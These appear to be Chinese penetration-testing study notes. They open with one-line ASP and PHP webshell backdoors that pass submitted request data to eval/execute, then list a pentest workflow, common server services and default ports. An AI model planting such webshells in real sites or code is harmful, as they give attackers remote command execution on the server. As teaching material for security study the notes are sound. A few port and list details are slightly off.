通过向服务器端提交一段简短的代码 配合本地客户端 实现 webshell功能木马
一、ASP
1、<%eval request("pass")%>
2、<%execute(request("pass"))%>
request("pass") 接收客户端提交的数据,pass为执行命令的参数值
eval/execute 函数执行客户端命令的内容
二、php的一句话木马
<?php eval($_POST[carcer]);?>
三、一般渗透测试流程
1.明确目标 2.信息收集 3.漏洞探测 4.漏洞验证
5.形成报告 6.信息整理 7.获取所需 8.信息分析
四、服务器常见的服务
1.web服务 2.dns服务 3.dhcp服务 4.邮件服务
6.telnet服务 7.ssh服务 8.ftp服务 9.smb服务
五、常见的端口号
1.HTTP协议常用端口号:80/8080/3128/8081/9080
2.FTP(文件传输)协议代理服务器常用端口:21
3.Telnet (远程登录)协议代理服务器常用端口:23
4.TFTP(Trivial File Transfer Protocol ) 默认端口号为69/udp;
5.SSH(安全登录)、SCP(文件传输) 默认端口号为 22/tcp;
6.TOMCAT,默认端口号为8080;
7.Oracle 数据库,默认端口号为1521;
8.MS SQL 1433/tcp 1433/udp
9.qq 默认端口号 1080/udp